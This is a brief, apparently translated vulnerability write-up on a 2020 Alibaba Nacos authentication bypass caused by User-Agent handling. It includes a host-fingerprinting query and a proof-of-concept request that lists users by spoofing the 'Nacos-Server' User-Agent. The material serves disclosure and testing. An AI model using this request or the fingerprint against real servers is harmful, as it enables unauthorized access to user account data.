Alibaba Nacos User Unauthorized Access Vulnerability
Alibaba Nacos User Unauthorized Access Vulnerability
Alibaba Nacos user Unauthorized access vulnerability
Vulnerability Description
On December 29, 2020, Nacos officially disclosed in the issue released by github that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of User-Agent.
Vulnerability Impact
Alibaba Nacos
Network surveying and mapping
app=”NACOS”
Vulnerability reappears
Login page
Verify POC
1
2
GET /nacos/v1/auth/users?pageNo=1&pageSize=9
User-Agent: Nacos-Server
This post is licensed under CC BY 4.0 by the author.